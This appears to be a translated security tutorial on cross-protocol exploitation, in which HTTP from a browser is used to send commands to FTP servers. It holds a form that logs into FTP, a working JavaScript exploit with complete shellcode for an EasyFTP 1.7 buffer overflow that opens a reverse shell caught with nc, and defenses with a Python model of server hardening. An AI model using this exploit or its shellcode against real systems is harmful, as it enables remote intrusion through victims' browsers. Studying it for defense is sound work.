Cross-Protocol Communication Technology exploitation and defense

Source: Internet
Author: User
Tags: ftp commands

What is cross-protocol communication?

Cross-protocol communication (Inter-Protocol Communication) refers to a technique in which two different protocols exchange commands and data. One is called the target protocol and the other the carrier protocol. The target protocol is the protocol we ultimately want to talk to, and the carrier protocol is used to encapsulate the commands and data we actually want to send.

There are two necessary conditions for this type of communication to be completed:

1. The target protocol must be fault tolerant. Because the instructions are transmitted through a carrier protocol, they will be interleaved with lines that the target protocol cannot recognize.

2. The carrier protocol must be able to encapsulate the instructions of the target protocol. Even if the target protocol cannot recognize every encapsulated command, it must still be able to identify the final, intended commands.

How to use cross-protocol communication

Cross-protocol exploitation (Inter-Protocol Exploitation) uses one protocol to attack a service that runs another protocol.

When the carrier protocol is HTTP, the attack can be launched through a browser. This lets an attacker reach resources and services that only the victim can access (for example, Intranet services that are not exposed to the Internet). In this process the victim's browser acts as a zombie that receives and executes the risky code.

Protocols that use line breaks as command delimiters, such as SMTP, POP3, IRC and FTP, are all affected by this attack. This is because the target protocol processes multi-line input one line at a time, and these protocols are fault tolerant: they ignore lines they cannot recognize and execute only the commands they can identify.

To better understand cross-Protocol Communication, let's look at a simple example.

Example 1: connect to the FTP server over HTTP

Connecting to an FTP server from a browser is very easy: a single HTTP POST request is enough. The following form connects to a local FTP server.

    <form method='POST' action='http://localhost:21' enctype='multipart/form-data'>
    <input type='hidden' name='a' value='user secforce'>
    <input type='hidden' name='a' value='pass secforce'>
    <input type='submit'>
    </form>

If the FTP user and password exist, submitting this form logs on to the FTP server. It is that simple.

The specific POST request packet is as follows:

    POST / HTTP/1.1
    Host: 127.0.0.1:21
    User-Agent: Mozilla/5.0 (X11; Debian; Linux x86_32; rv:16.0) Gecko/20110007 Firefox/20.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-gb,en;q=0.5
    Accept-Encoding: gzip, deflate
    Proxy-Connection: keep-alive
    Content-Type: multipart/form-data; boundary=---------------------------63079936718166855021600323653
    Content-Length: 304

    -----------------------------63079936718166855021600323653
    Content-Disposition: form-data; name="a"

    user secforce
    -----------------------------63079936718166855021600323653
    Content-Disposition: form-data; name="a"

    pass secforce
    -----------------------------63079936718166855021600323653--

The server's reply is shown below. Every 50x error corresponds to an HTTP line that the FTP server could not recognize; the server ignores those lines and executes only the commands it can identify.

    220--------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-Local time is now 12:41. Server port: 21.
    220-This is a private system - No anonymous login
    220 You will be disconnected after 15 minutes of inactivity.
    530 You aren't logged in
    500 ?
    500 ?
    500 ?
    500 ?
    500 ?
    500 ?
    500 ?
    500 ?
    500 ?
    500 ?
    500 ?
    500 ?
    331 User secforce OK. Password required
    500 ?
    500 ?
    500 ?
    230 OK. Current directory is /
    500 ?

If you test this yourself, you may find that not all FTP commands work. Commands such as MKD/RMD and DEL, GET/PUT, and RETR/STOR do not work normally. This is because FTP is an out-of-band protocol: its data and control commands are transmitted over different TCP ports. In fact, if you try to use STOR to upload a file to the server, you will find that an empty file with the same name is created on the server, because the file is created before the data transfer begins. Commands that do not need a separate data connection all work normally.

Let's look at a more interesting example.

Example 2: reverse shell over HTTP Overflow

In this example, EasyFTP v1.7 is used. This version has a buffer overflow vulnerability in the MKD command; note that this command can be executed successfully without an additional data connection channel. We set up the server (192.168.1.10) in a virtual machine and created the "anonymous" user. The prerequisite for exploiting this vulnerability is to log on to the FTP server first.

Since there is no need to reinvent the wheel, we use a public exploit (see [1]) to construct the POST request. This time we use JavaScript to send the shellcode to the FTP server. To transmit the shellcode bytes unchanged, we use the sendAsBinary function.

The final function is as follows:

    function exploit() {
        var url = 'http://192.168.1.10:21';
        var intro = 'USER anonymous\r\nPASS anonymous\r\n';
        var payload = 'MKD \x89\xe7\x81\xef\x10\xfe\xff\xff\xc7\x07\x13\x57\x7e\xd6\x81\xc7\x14\xff\xff\xff\xff\xe7\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\xba\xae\x16\xd0\x74\xd9\xcc\xd9\x74\x24\xf4\x5e\x29\xc9\xb1\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x4c\xe3\x2c\x9c\x19\x0c\xcd\x5d\x79\x84\x28\x6c\xab\xf2\x39\xdd\x7b\x70\x6f\xee\xf0\xd4\x84\x65\x74\xf1\xab\xce\x32\x27\x85\xcf\xf3\xe7\x49\x13\x92\x9b\x93\x40\x74\xa5\x5b\x95\x75\xe2\x86\x56\x27\xbb\xcd\xc5\xd7\xc8\x90\xd5\xd6\x1e\x9f\x66\xa0\x1b\x60\x12\x1a\x25\xb1\x8b\x11\x6d\x29\xa7\x7d\x4e\x48\x64\x9e\xb2\x03\x01\x54\x40\x92\xc3\xa5\xa9\xa4\x2b\x69\x94\x08\xa6\x70\xd0\xaf\x59\x07\x2a\xcc\xe4\x1f\xe9\xae\x32\xaa\xec\x09\xb0\x0c\xd5\xa8\x15\xca\x9e\xa7\xd2\x99\xf9\xab\xe5\x4e\x72\xd7\x6e\x71\x55\x51\x34\x55\x71\x39\xee\xf4\x20\xe7\x41\x09\x32\x4f\x3d\xaf\x38\x62\x2a\xc9\x62\xeb\x9f\xe7\x9c\xeb\xb7\x70\xee\xd9\x18\x2a\x78\x52\xd0\xf4\x7f\x95\xcb\x40\xef\x68\xf4\xb0\x39\xaf\xa0\xe0\x51\x06\xc9\x6b\xa2\xa7\x1c\x3b\xf2\x07\xcf\xfb\xa2\xe7\xbf\x93\xa8\xe7\xe0\x83\xd2\x2d\x97\x84\x45\x62\xb8\x1a\x92\x12\xbb\x1a\x8b\xbe\x32\xfc\xc1\x2e\xec\x41\x40\x00\x3e\x23\x1f\x17\x95\xa3\xbc\x8a\x72\x33\xca\xb6\x2c\x64\x9b\x09\x25\xe0\x31\x33\x9f\x16\xc8\xa5\xd8\x92\x17\x16\xe6\x1b\xd5\x22\xcc\x0b\x23\xaa\x48\x7f\xfb\xfd\x06\x29\xbd\x57\xe9\x83\x17\x0b\xa3\x43\xe1\x67\x74\x15\xee\xad\x02\xf9\x5f\x18\x53\x06\x6f\xcc\x53\x7f\x8d\x6c\x9b\xaa\x15\x8c\x7e\x7e\x60\x25\x27\xeb\xc9\x28\xd8\xc6\x0e\x55\x5b\xe2\xee\xa2\x43\x87\xeb\xef\xc3\x74\x86\x60\xa6\x7a\x35\x80\xe3';
        var req = new XMLHttpRequest();
        req.open('POST', url, true);
        req.setRequestHeader('Content-Type', 'text/plain');
        req.setRequestHeader('Content-Length', '20');
        // sendAsBinary() was a non-standard, Firefox-only extension of XMLHttpRequest
        // (since removed); it transmits each character of the string as one raw byte.
        req.sendAsBinary(intro + payload + '\r\n'); // neat way to send hexadecimal code through HTTP
    }

Here the payload is chosen to open a reverse shell to port 4444 on our host, where we listen with nc. When the web page embedding the JavaScript above is opened in the browser, the shell appears.

How to defend against attacks

1. Blocked ports. By default, most browsers refuse to connect to well-known ports such as 21/FTP and 25/SMTP. This protection depends on the browser configuration, and it does not cover a service listening on a non-standard port.

2. Less fault tolerance. Some protocols close the connection as soon as they receive an unrecognized command. This reduces flexibility but strengthens the defense against cross-protocol attacks. A better compromise is to close the connection only after several unrecognized commands are received consecutively.
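As an added illustration (not code from the original article), the following Python model shows why the tolerant, line-oriented server in Example 1 ends up logged in from an HTTP POST, and how the "close after several consecutive unrecognized commands" hardening from point 2 stops the same request before the USER line is ever reached. The request is a shortened, constructed version of the POST shown above, and the reply strings and the 421 close reply are assumptions modelled on the Pure-FTPd output.

```python
# Constructed sample request: a shortened form of the page's multipart POST,
# exactly as its bytes would arrive on the FTP control channel.
RAW_REQUEST = (
    "POST / HTTP/1.1\r\n"
    "Host: 127.0.0.1:21\r\n"
    "Content-Type: multipart/form-data; boundary=XXX\r\n"
    "Content-Length: 304\r\n"
    "\r\n"                       # end of HTTP headers: an empty line
    "--XXX\r\n"
    'Content-Disposition: form-data; name="a"\r\n'
    "\r\n"
    "user secforce\r\n"          # the only lines the FTP parser understands
    "--XXX\r\n"
    'Content-Disposition: form-data; name="a"\r\n'
    "\r\n"
    "pass secforce\r\n"
    "--XXX--\r\n"
)
KNOWN = {"USER", "PASS", "QUIT"}  # minimal command set for the model

def ftp_session(raw, max_unknown=None):
    """Replay `raw` line by line against a model FTP control channel.
    max_unknown=None: tolerant server of Example 1, unknown lines get '500 ?'.
    max_unknown=N: hardened server, N consecutive unknown lines close it
    (the 421 reply is an assumption).  Returns the list of reply lines."""
    replies, user, unknown_run = [], None, 0
    for line in raw.splitlines():
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb not in KNOWN:          # HTTP header, boundary or blank line
            unknown_run += 1
            replies.append("500 ?")
            if max_unknown is not None and unknown_run >= max_unknown:
                replies.append("421 Too many unknown commands, closing")
                break
            continue
        unknown_run = 0                # a valid command resets the counter
        if verb == "USER":
            user = arg
            replies.append(f"331 User {arg} OK. Password required")
        elif verb == "PASS":
            replies.append("230 OK. Current directory is /" if user
                           else "503 Login with USER first")
        elif verb == "QUIT":
            replies.append("221 Goodbye")
            break
    return replies
```

With the default (tolerant) setting the replay reaches the 230 login reply after twelve "500 ?" lines, mirroring the capture above; with max_unknown=3 the HTTP request line and the first two headers already exhaust the budget and the session is closed.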

Conclusion

As mentioned above, there are many restrictions on this kind of attack. In general, there are better ways to achieve the same result than a cross-protocol attack. In a specific environment, however, this type of attack can be a very effective method.
